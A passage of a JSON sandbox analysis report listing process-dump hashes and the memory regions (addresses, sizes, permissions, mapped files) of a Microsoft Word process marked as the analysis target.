{ "archive_path": "process_dumps/process_00000009-region_00001521-addr_0x0000000000300000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000009-region_00001521-addr_0x0000000000300000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_227", "md5_hash": "daa48ae7e8dff5efccec63825e56c072", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "24017581623d05fad33f09510a3f01e6bbd8b5bd", "sha256_hash": "fbb4186cbd1e50bafdac1546b2947b09e32ac647818c89ef1bb9f6aaa3c491a2", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001536-addr_0x00000000002e0000-size_0x0000000000001000-perm_rw.bin", 
"filename": "process_00000009-region_00001536-addr_0x00000000002e0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_228", "md5_hash": "162be08fb256ce149251783b5d950182", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "8d07f63681f79baed21869d16b3e702f0a8c3e0a", "sha256_hash": "7b7d8afc65f2028851f6747d7e77724ccedc18b203f5ddcc6ca3731fa3c18a00", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000009-region_00001537-addr_0x00000000002f0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000009-region_00001537-addr_0x00000000002f0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_229", "md5_hash": "620f0b67a91f7f74151bc5be745b7110", "ref_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d", "sha256_hash": "ad7facb2586fc6e966c004d7d1d16b024f5805ff7cb47c7a85dabd8b48892ca7", "size": 4096, "type": "process_dump", "version": 1 } ], "processes": [ { "cmd_line": "\"C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE\"", "filename": "c:\\program files\\microsoft office\\office15\\winword.exe", "id": "proc_1", "image_name": "winword.exe", "monitor_reason": "analysis_target", "monitored_id": 1, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_136", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", 
"flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_137", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_138", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 278527, "entry_point": 0, "filename": null, "id": "region_139", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 331775, "entry_point": 0, "filename": null, "id": "region_140", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { 
"dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_141", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_142", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1929215, "entry_point": 1507328, "filename": "\\Windows\\System32\\locale.nls", "id": "region_143", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1507328, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1974271, "entry_point": 0, "filename": null, "id": "region_144", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", 
"start_va": 1966080, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_145", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 3145727, "entry_point": 0, "filename": null, "id": "region_146", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3964927, "entry_point": 0, "filename": null, "id": "region_147", "name": "pagefile_0x0000000000300000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3145728, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4001791, "entry_point": 0, "filename": null, "id": "region_148", "name": "private_0x00000000003d0000", 
"norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4128767, "entry_point": 0, "filename": null, "id": "region_149", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 200704, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4329471, "entry_point": 0, "filename": null, "id": "region_150", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 0, "filename": null, "id": "region_151", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4464639, "entry_point": 0, "filename": null, "id": "region_152", 
"name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4562943, "entry_point": 0, "filename": null, "id": "region_153", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_154", "name": "private_0x0000000000460000", "norm_filename": null, "region_type": "private_memory", "start_va": 4587520, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4915199, "entry_point": 0, "filename": null, "id": "region_155", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 4943871, "entry_point": 0, 
"filename": null, "id": "region_156", "name": "pagefile_0x00000000004b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4915200, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4980736, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_157", "name": "private_0x00000000004c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4980736, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 5054463, "entry_point": 0, "filename": null, "id": "region_158", "name": "pagefile_0x00000000004d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5046272, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5242879, "entry_point": 0, "filename": null, "id": "region_159", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5242880, "type": "region", 
"version": 1 }, "end_va": 6295551, "entry_point": 0, "filename": null, "id": "region_160", "name": "pagefile_0x0000000000500000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5242880, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 7270399, "entry_point": 0, "filename": null, "id": "region_161", "name": "pagefile_0x0000000000610000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6356992, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 7274496, "type": "region", "version": 1 }, "end_va": 7282687, "entry_point": 0, "filename": null, "id": "region_162", "name": "pagefile_0x00000000006f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7274496, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7340032, "type": "region", "version": 1 }, "end_va": 7344127, "entry_point": 0, "filename": null, "id": "region_163", "name": "private_0x0000000000700000", "norm_filename": null, "region_type": "private_memory", "start_va": 7340032, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 
4096, "start_va": 7471104, "type": "region", "version": 1 }, "end_va": 7475199, "entry_point": 0, "filename": null, "id": "region_164", "name": "private_0x0000000000720000", "norm_filename": null, "region_type": "private_memory", "start_va": 7471104, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7602176, "type": "region", "version": 1 }, "end_va": 7606271, "entry_point": 0, "filename": null, "id": "region_165", "name": "private_0x0000000000740000", "norm_filename": null, "region_type": "private_memory", "start_va": 7602176, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 7737343, "entry_point": 0, "filename": null, "id": "region_166", "name": "private_0x0000000000760000", "norm_filename": null, "region_type": "private_memory", "start_va": 7733248, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 7798784, "type": "region", "version": 1 }, "end_va": 7929855, "entry_point": 0, "filename": null, "id": "region_167", "name": "private_0x0000000000770000", "norm_filename": null, "region_type": "private_memory", "start_va": 7798784, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", 
"writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7929856, "type": "region", "version": 1 }, "end_va": 8978431, "entry_point": 0, "filename": null, "id": "region_168", "name": "private_0x0000000000790000", "norm_filename": null, "region_type": "private_memory", "start_va": 7929856, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8978432, "type": "region", "version": 1 }, "end_va": 8982527, "entry_point": 0, "filename": null, "id": "region_169", "name": "pagefile_0x0000000000890000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8978432, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 9043968, "type": "region", "version": 1 }, "end_va": 9048063, "entry_point": 0, "filename": null, "id": "region_170", "name": "private_0x00000000008a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9043968, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 9109504, "type": "region", "version": 1 }, "end_va": 9113599, "entry_point": 0, "filename": null, "id": "region_171", "name": "pagefile_0x00000000008b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9109504, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because 
region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 9175040, "type": "region", "version": 1 }, "end_va": 9191423, "entry_point": 0, "filename": null, "id": "region_172", "name": "pagefile_0x00000000008c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9175040, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 9240576, "type": "region", "version": 1 }, "end_va": 10289151, "entry_point": 0, "filename": null, "id": "region_173", "name": "private_0x00000000008d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9240576, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 10289152, "type": "region", "version": 1 }, "end_va": 14430207, "entry_point": 0, "filename": null, "id": "region_174", "name": "pagefile_0x00000000009d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10289152, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 14483456, "type": "region", "version": 1 }, "end_va": 15532031, "entry_point": 0, "filename": null, "id": "region_175", "name": "private_0x0000000000dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 14483456, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", 
"flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 15597568, "type": "region", "version": 1 }, "end_va": 15601663, "entry_point": 0, "filename": null, "id": "region_176", "name": "private_0x0000000000ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 15597568, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 15728640, "type": "region", "version": 1 }, "end_va": 15732735, "entry_point": 0, "filename": null, "id": "region_177", "name": "private_0x0000000000f00000", "norm_filename": null, "region_type": "private_memory", "start_va": 15728640, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 15859712, "type": "region", "version": 1 }, "end_va": 15863807, "entry_point": 0, "filename": null, "id": "region_178", "name": "private_0x0000000000f20000", "norm_filename": null, "region_type": "private_memory", "start_va": 15859712, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 15990784, "type": "region", "version": 1 }, "end_va": 15994879, "entry_point": 0, "filename": null, "id": "region_179", "name": "private_0x0000000000f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 15990784, "timestamp": "00:00:14.818", "type": 
"region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 16056320, "type": "region", "version": 1 }, "end_va": 16060415, "entry_point": 0, "filename": null, "id": "region_180", "name": "private_0x0000000000f50000", "norm_filename": null, "region_type": "private_memory", "start_va": 16056320, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 16121856, "type": "region", "version": 1 }, "end_va": 16130047, "entry_point": 0, "filename": null, "id": "region_181", "name": "pagefile_0x0000000000f60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 16121856, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 16187392, "type": "region", "version": 1 }, "end_va": 16191487, "entry_point": 0, "filename": null, "id": "region_182", "name": "pagefile_0x0000000000f70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 16187392, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 16252928, "type": "region", "version": 1 }, "end_va": 18182143, "entry_point": 16252928, "filename": "\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE", "id": "region_183", "name": "winword.exe", 
"norm_filename": "c:\\program files\\microsoft office\\office15\\winword.exe", "region_type": "memory_mapped_file", "start_va": 16252928, "timestamp": "00:00:14.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 18219008, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_184", "name": "pagefile_0x0000000001160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18219008, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 33746943, "entry_point": 30801920, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_185", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 30801920, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 33751040, "type": "region", "version": 1 }, "end_va": 34275327, "entry_point": 0, "filename": null, "id": "region_186", "name": "private_0x0000000002030000", "norm_filename": null, "region_type": "private_memory", "start_va": 33751040, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", 
"executable" ], "ref_process_dump": null, "size": 262144, "start_va": 34275328, "type": "region", "version": 1 }, "end_va": 34537471, "entry_point": 0, "filename": null, "id": "region_187", "name": "private_0x00000000020b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34275328, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 34537472, "type": "region", "version": 1 }, "end_va": 34541567, "entry_point": 0, "filename": null, "id": "region_188", "name": "pagefile_0x00000000020f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 34537472, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 34603008, "type": "region", "version": 1 }, "end_va": 34607103, "entry_point": 34603008, "filename": "\\Windows\\System32\\msxml6r.dll", "id": "region_189", "name": "msxml6r.dll", "norm_filename": "c:\\windows\\system32\\msxml6r.dll", "region_type": "memory_mapped_file", "start_va": 34603008, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 34668544, "type": "region", "version": 1 }, "end_va": 34672639, "entry_point": 0, "filename": null, "id": "region_190", "name": "private_0x0000000002110000", "norm_filename": null, "region_type": "private_memory", "start_va": 34668544, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 34799616, "type": "region", "version": 1 }, "end_va": 34803711, "entry_point": 0, "filename": null, "id": "region_191", "name": "private_0x0000000002130000", "norm_filename": null, "region_type": "private_memory", "start_va": 34799616, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 34930688, "type": "region", "version": 1 }, "end_va": 34934783, "entry_point": 0, "filename": null, "id": "region_192", "name": "private_0x0000000002150000", "norm_filename": null, "region_type": "private_memory", "start_va": 34930688, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35061760, "type": "region", "version": 1 }, "end_va": 35065855, "entry_point": 0, "filename": null, "id": "region_193", "name": "private_0x0000000002170000", "norm_filename": null, "region_type": "private_memory", "start_va": 35061760, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35323904, "type": "region", "version": 1 }, "end_va": 35327999, "entry_point": 0, "filename": null, "id": "region_194", "name": "private_0x00000000021b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35323904, "timestamp": "00:00:14.819", "type": "region", 
"version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35520512, "type": "region", "version": 1 }, "end_va": 35524607, "entry_point": 0, "filename": null, "id": "region_195", "name": "private_0x00000000021e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35520512, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 151552, "start_va": 35717120, "type": "region", "version": 1 }, "end_va": 35868671, "entry_point": 35717120, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db", "id": "region_196", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db", "region_type": "memory_mapped_file", "start_va": 35717120, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35913728, "type": "region", "version": 1 }, "end_va": 35917823, "entry_point": 0, "filename": null, "id": "region_197", "name": "pagefile_0x0000000002240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 35913728, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", 
